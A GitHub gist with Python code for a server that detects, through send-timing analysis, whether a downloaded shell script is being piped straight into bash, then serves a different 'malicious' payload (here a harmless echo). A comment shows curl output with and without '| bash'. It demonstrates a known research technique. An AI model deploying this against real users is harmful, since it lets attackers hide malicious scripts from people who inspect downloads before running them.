Skip to content

Instantly share code, notes, and snippets.

@altescy
Last active July 31, 2024 14:48
Show Gist options
  • Save altescy/47aad2417b8b1ae0610c9283f19e201f to your computer and use it in GitHub Desktop.
Save altescy/47aad2417b8b1ae0610c9283f19e201f to your computer and use it in GitHub Desktop.
Detecting bash execution via HTTP request (originally from https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/)
import dataclasses
import datetime
import re
import socket
import socketserver
import time
class config:
    """Static settings shared by the request handler."""

    # Timeout, in seconds, applied to each accepted client socket.
    SOCKET_TIMEOUT = 10
    # Requested SO_SNDBUF size in bytes; also the size of one padding chunk.
    BUFFER_SIZE = 87380
    # Response head sent before the first chunk. HTTP/1.1 terminates every
    # header line with CRLF and ends the header section with an empty CRLF
    # line, so bare "\n" is not used here.
    PACKET = (
        "HTTP/1.1 200 OK\r\n"
        "Server: Apache\r\n"
        "Content-Type: text/plain; charset=us-ascii\r\n"
        "Transfer-Encoding: chunked\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
    )
    # Number of padding chunks sent while timing the client.
    MAX_PADDING = 16
    # One padding chunk: BUFFER_SIZE NUL characters.
    PADDING = chr(0) * BUFFER_SIZE
@dataclasses.dataclass
class Payload:
    """Shell snippets served for one URI, plus the detection thresholds."""

    # Always sent first, as its own chunk, before any other script text.
    null: str = dataclasses.field(default="sleep 3\n")
    # Script text sent when piping into bash is not detected.
    good: str = dataclasses.field(default="echo 'Hello there :)'\n")
    # Script text sent when piping into bash is detected.
    bad: str = dataclasses.field(
        default="echo 'This is a malicious script :D'\n"
    )
    # The largest gap between padding chunks must exceed this many seconds.
    min_jump: float = dataclasses.field(default=2.0)
    # Variance of the remaining gaps must stay below this value.
    max_variance: float = dataclasses.field(default=0.1)
def var(values: list[float]) -> float:
    """Return the population variance of *values*.

    Raises ZeroDivisionError when *values* is empty.
    """
    count = len(values)
    centre = sum(values) / count
    squared_deviations = [(value - centre) ** 2 for value in values]
    return sum(squared_deviations) / count
def popmax(values: list[float]) -> float:
    """Remove the first occurrence of the largest item from *values* and return it.

    The list is modified in place. Raises ValueError when *values* is empty.
    """
    largest = max(values)
    values.remove(largest)
    return largest
class HTTPHandler(socketserver.BaseRequestHandler):
    """Answer one HTTP GET with a chunked shell script chosen by send timing.

    Every response starts with the payload's ``null`` snippet. For curl/Wget
    clients the handler then streams NUL padding chunks and times them; a
    single large gap with otherwise steady gaps is treated (per the log
    messages) as the script being executed by bash, and the ``bad`` snippet is
    sent. Every other case gets the ``good`` snippet.
    """

    # URI -> Payload registry. It lives on the class, so every handler
    # instance shares it.
    PAYLOADS: dict[str, Payload] = {}

    def sendchunk(self, chunk: str) -> None:
        """Send *chunk* as one chunk of an HTTP/1.1 chunked response.

        An empty string produces the terminating zero-length chunk.
        """
        body = chunk.encode("us-ascii")
        # Chunk framing is "<hex size>CRLF<data>CRLF"; bare LF is not valid.
        self.request.sendall(f"{len(body):x}\r\n".encode("us-ascii"))
        self.request.sendall(body)
        self.request.sendall(b"\r\n")

    def log(self, message: str) -> None:
        """Print *message* prefixed with a timestamp and the client IP."""
        print(
            f"[{datetime.datetime.now().isoformat()}] "
            f"{self.client_address[0]} {message}"
        )

    def handle(self) -> None:
        """Read the request, pick the payload for its URI and send the reply."""
        self.log("Inbound request")
        self.request.settimeout(config.SOCKET_TIMEOUT)
        self.request.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        self.request.setsockopt(
            socket.SOL_SOCKET,
            socket.SO_SNDBUF,
            config.BUFFER_SIZE,
        )

        try:
            raw = self.request.recv(1024)
        except socket.timeout:
            self.log("No data received")
            return
        # The request is untrusted input: replace non-ASCII bytes instead of
        # letting UnicodeDecodeError escape the handler.
        data = raw.decode("us-ascii", errors="replace")

        uri = re.search(r"GET ([^ ]+) HTTP/[0-9.]+", data)
        if not uri:
            self.log("HTTP request malformed")
            return
        request_uri = uri.group(1)
        self.log(f"Request for shell script {request_uri}")

        payload = self.PAYLOADS.get(request_uri)
        if payload is None:
            self.log(f"No payload found for {request_uri}")
            return

        try:
            self._respond(payload, data)
        except OSError as error:
            # Covers send timeouts and clients that disconnect mid-response.
            self.log(f"Connection error: {error}")

    def _respond(self, payload: Payload, data: str) -> None:
        """Send the response head and the chunks selected for this client."""
        self.request.sendall(bytes(config.PACKET, "us-ascii"))
        self.sendchunk(payload.null)

        if not re.search("User-Agent: (curl|Wget)", data):
            self.sendchunk(payload.good)
            self.sendchunk("")
            self.log("Request not via wget/curl. Returning good payload.")
            return

        jump, variance = self._time_padding()
        self.log(f"Maximum Jump: {jump}, Variance: {variance}")

        if variance < payload.max_variance and jump > payload.min_jump:
            self.log("Execution through bash detected - sending bad payload :D")
            self.sendchunk(payload.bad)
        else:
            self.log("Sending good payload :(")
            self.sendchunk(payload.good)

        self.sendchunk("")
        self.log("Connection closed")

    def _time_padding(self) -> tuple[float, float]:
        """Send the padding chunks; return (largest gap, variance of the rest)."""
        # monotonic() cannot jump when the wall clock is adjusted, so the
        # measured gaps reflect only how long the sends took.
        start = time.monotonic()
        elapsed = []
        for _ in range(config.MAX_PADDING):
            self.sendchunk(config.PADDING)
            elapsed.append(time.monotonic() - start)

        # Gaps between the completion times of consecutive padding chunks.
        gaps = [later - earlier for earlier, later in zip(elapsed, elapsed[1:])]
        # popmax removes the largest gap, so the variance covers only the rest.
        jump = popmax(gaps)
        return jump, var(gaps)
class BashDetectionServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """Threaded TCP server that hands every connection to HTTPHandler."""

    # socketserver option: permit reuse of the listening address.
    allow_reuse_address = True
    # socketserver option: run handler threads as daemon threads.
    daemon_threads = True

    def __init__(self, server_address: tuple[str, int]) -> None:
        """Create the server on *server_address*, a (host, port) pair."""
        super().__init__(server_address, RequestHandlerClass=HTTPHandler)

    def setpayload(self, uri: str, payload: Payload) -> None:
        """Register *payload* as the response for requests to *uri*.

        The mapping is stored on HTTPHandler.PAYLOADS, a class attribute, so
        it is shared by every handler instance.
        """
        HTTPHandler.PAYLOADS.update({uri: payload})
if __name__ == "__main__":
    # Demo entry point: serve the default Payload at /setup.sh on port 5555.
    HOST, PORT = "0.0.0.0", 5555
    # Using the server as a context manager closes the listening socket on
    # exit, including when serve_forever() is interrupted.
    with BashDetectionServer((HOST, PORT)) as server:
        server.setpayload("/setup.sh", Payload())
        print(f"Listening on http://{HOST}:{PORT}")
        try:
            server.serve_forever()
        except KeyboardInterrupt:
            # Ctrl-C is the expected way to stop; exit without a traceback.
            print("Shutting down")
@altescy
Copy link
Author

altescy commented Dec 27, 2022

Execution result:

❯ curl -o -  http://localhost:5555/setup.sh
sleep 3
echo 'Hello there :)'

❯ curl -o -  http://localhost:5555/setup.sh | bash
This is a malicious script :D

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment